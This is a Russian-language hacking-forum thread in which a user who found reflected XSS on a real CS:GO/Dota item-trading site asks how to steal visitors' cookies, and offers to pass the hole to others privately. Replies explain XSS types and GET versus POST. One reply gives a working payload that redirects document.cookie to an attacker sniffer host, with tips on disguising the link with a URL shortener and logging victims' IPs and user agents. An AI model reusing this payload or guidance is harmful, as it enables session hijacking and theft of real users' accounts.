ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Опять насчёт xss . (https://forum.antichat.xyz/showthread.php?t=428519)

sander 03.08.2015 09:58

Я нашёл XSS уязвимость срабатывает при вводе скрипта и его отправки в саппорт .

А как XSS на линку повесить тогда?Что бы когда жертва переходила по линке xss срабатывала и куки приходили на сниффер .

Кстати кому надо могу в личку xss слить она от ксго сайта + дота .

+ Нашёл ещё xss в поиске . Точнее в поиске игроков .

При вводе ">alert() появляется пустое окно,в поиске игроков за место моего скрипта,появляется \ . + меняется ссылка,туда этот скрипт вбился . Это пассив или актив ? .

И как чёрт подери повесить xss на сниффер,у меня снифф онлайн hackerlab .

Filipp 03.08.2015 11:06

Цитата:

Сообщение от SaNDER

Я нашёл XSS уязвимость срабатывает при вводе скрипта и его отправки в саппорт .
А как XSS на линку повесить тогда?Что бы когда жертва переходила по линке xss срабатывала и куки приходили на сниффер .
Кстати кому надо могу в личку xss слить она от ксго сайта + дота .
+ Нашёл ещё xss в поиске . Точнее в поиске игроков .
При вводе ">alert() появляется пустое окно,в поиске игроков за место моего скрипта,появляется \ . + меняется ссылка,туда этот скрипт вбился . Это пассив или актив ? .
И как чёрт подери повесить xss на сниффер,у меня снифф онлайн hackerlab .

Скорее всего XSS твоя в POST параметре) Тоже вещь опасная.. Где то видил тут тему создавали про POST XSS, поищи на форуме.

BigBear 03.08.2015 11:30

Цитата:

Сообщение от SaNDER

Это пассив или актив ?

Это вы геев так будете классифицировать.

А XSS может быть:

1) Stored (persistent)

2) Reflected

3) DOM-based

4) Self-xss

У вас скорее всего тип Reflected.

sander 03.08.2015 11:45

Цитата:

Сообщение от BigBear

Это вы геев так будете классифицировать.
А XSS может быть:
1) Stored (persistent)
2) Reflected
3) DOM-based
4) Self-xss
У вас скорее всего тип Reflected.

Reflected - перевод можно ?

sander 03.08.2015 11:59

Цитата:

Сообщение от Filipp

Скорее всего XSS твоя в POST параметре) Тоже вещь опасная.. Где то видил тут тему создавали про POST XSS, поищи на форуме.

а как узнать в пост она параметре или нет ?,

Чисто для инфы . Сайт продажа/покупка вещей кс го + ещё один сайт для доты(все также токо для доты),переход по сайтам через кнопочку . Авторизация на сайт через стим .

Покупка через стим трейд .

Защита HTTPS .

grimnir 03.08.2015 13:37

Цитата:

Сообщение от SaNDER

Reflected - перевод можно ?

Отражённые (Непостоянные)

Атака, основанная на отражённой уязвимости, на сегодняшний день является самой распространенной XSS-атакой.Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в форме HTML, исполняются непосредственно серверными скриптами для синтаксического анализа и отображения страницы результатов для этого клиента, без надлежащей обработки. Отражённая XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.

Пример:

http://example.com/search.php?q=DoSomething();

Если сайт не экранирует угловые скобки, преобразуя их в «<» и «>», получим скрипт на странице результатов поиска.

Отражённые атаки, как правило, рассылаются по электронной почте или размещаются на Web-странице. URL приманки не вызывает подозрения, указывая на надёжный сайт, но содержит вектор XSS. Если доверенный сайт уязвим к вектору XSS, то переход по ссылке может привести к тому, что браузер жертвы начнет выполнять встроенный скрипт.

Filipp 03.08.2015 13:55

Цитата:

Сообщение от SaNDER

а как узнать в пост она параметре или нет ?

Для начала почитай что такое POST.

sander 03.08.2015 13:56

Цитата:

Сообщение от grimnir

Отражённые (Непостоянные)
Атака, основанная на отражённой уязвимости, на сегодняшний день является самой распространенной XSS-атакой.Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в
форме HTML
, исполняются непосредственно серверными скриптами для
синтаксического анализа
и отображения страницы результатов для этого клиента, без надлежащей обработки. Отражённая XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.
Пример:
http://example.com/search.php?q=DoSomething();
Если сайт не экранирует угловые скобки, преобразуя их в «<» и «>», получим скрипт на странице результатов поиска.
Отражённые атаки, как правило, рассылаются по электронной почте или размещаются на Web-странице.
URL
приманки не вызывает подозрения, указывая на надёжный сайт, но содержит вектор XSS. Если доверенный сайт уязвим к вектору XSS, то переход по ссылке может привести к тому, что браузер жертвы начнет выполнять встроенный скрипт.

Мне нужен сниффер,в котором я могу вставить свою волшебную xss-ссылочку . И ещё,я как понял он ворует кукисы,а в кукисах хэш и если его расшифровать можно получить пароль ? .

sander 03.08.2015 14:03

Цитата:

Сообщение от Filipp

Скорее всего XSS твоя в POST параметре) Тоже вещь опасная.. Где то видил тут тему создавали про POST XSS, поищи на форуме.

Ну ведь скрипт в линке пошёл после "?" знака - смотрите сами ******.net/players/?st=">alert()

Filipp 03.08.2015 14:09

Цитата:

Сообщение от SaNDER

Ну ведь скрипт в линке пошёл после "?" знака - смотрите сами ******.net/players/?st=">alert()

Я ж тебе сказал, поройся в гугле и почитай про пост. Если твоя XSS в посте, ссылочку ты уже не подставишь. Например, данные с полей для входа в админку идут пост параметром. Получается что-то типа того:

POST /admin.php

...

HTTP-HEADERS

...

login=alert(1)&password=pass.

Обычный переход по ссылке это GET. Что бы раскрутить твою XSS'ку в посте, нужно заманить жертву на твой сайт, а оттуда можно уже будет отправить POST запрос на уязвимый сайт.

sander 03.08.2015 14:13

Цитата:

Сообщение от Filipp

Я ж тебе сказал, поройся в гугле и почитай про пост. Если твоя XSS в посте, ссылочку ты уже не подставишь. Например, данные с полей для входа в админку идут пост параметром. Получается что-то типа того:
POST /admin.php
...
HTTP-HEADERS
...
login=alert(1)&password=pass.
Обычный переход по ссылке это GET. Что бы раскрутить твою XSS'ку в посте, нужно заманить жертву на твой сайт, а оттуда можно уже будет отправить POST запрос на уязвимый сайт.

Мне нужен снифф где я могу за место стандартной ссылочке подставить свою,наверное это нужно или можно любую?.

Filipp 03.08.2015 14:15

Цитата:

Сообщение от SaNDER

Мне нужен снифф где я могу за место стандартной ссылочке подставить свою,наверное это нужно или можно любую?.

А сниффер тут причем? Пользуйся тем чем пользовался.

spiner 03.08.2015 14:29

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/
COLOR][/COLOR

сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:

******.net/players/?st=">window.location.href='http://mysnif.ru/snif.php?cookies='+document.cookie;

Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам

sander 03.08.2015 14:37

Цитата:

Сообщение от spiner

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/
COLOR][/COLOR

сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:
******.net/players/?st=">window.location.href='
http://mysnif.ru/snif.php?cookies='+document.cookie;
Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам

Cлушай,а жертва должна быть зарегена на сайте в котором xss? .

Я PHP не знаю,но код я составил так .

.SpoilerTarget" type="button">Spoiler: cod

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,"http://..");

curl_setopt($ch, CURLOPT_HEADER, 0); //

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");

$result = curl_exec ($ch);

curl_close ($ch);

У меня сервер на Hostinger.ru,как сделать так что при открытий сайта переходило на

xss ?

spiner 03.08.2015 22:33

что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.

sander 03.08.2015 23:30

Цитата:

Сообщение от spiner

что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.

Токо ты не ответил.а допилил я правильно по поводу user agent ?

spiner 03.08.2015 23:38

Цитата:

Сообщение от SaNDER

Токо ты не ответил.а допилил я правильно по поводу user agent ?

нет. ты подготавливаешь какой-то запрос на курл, а тебе нужно получить юзерагент пользователя, посетившего твой скрипт. храниться он в массиве $_SERVER, там же и айпи клиента:

$_SERVER['HTTP_USER_AGENT']

$_SERVER['REMOTE_ADDR']

PHPussy 03.08.2015 23:40

и куки $_SERVER[' HTTP_COOKIE']

spiner 03.08.2015 23:42

Цитата:

Сообщение от PHPussy

и куки $_SERVER[' HTTP_COOKIE']

а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах

PHPussy 03.08.2015 23:50

Цитата:

Сообщение от spiner

а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах

я про пхпинжект


Время: 12:10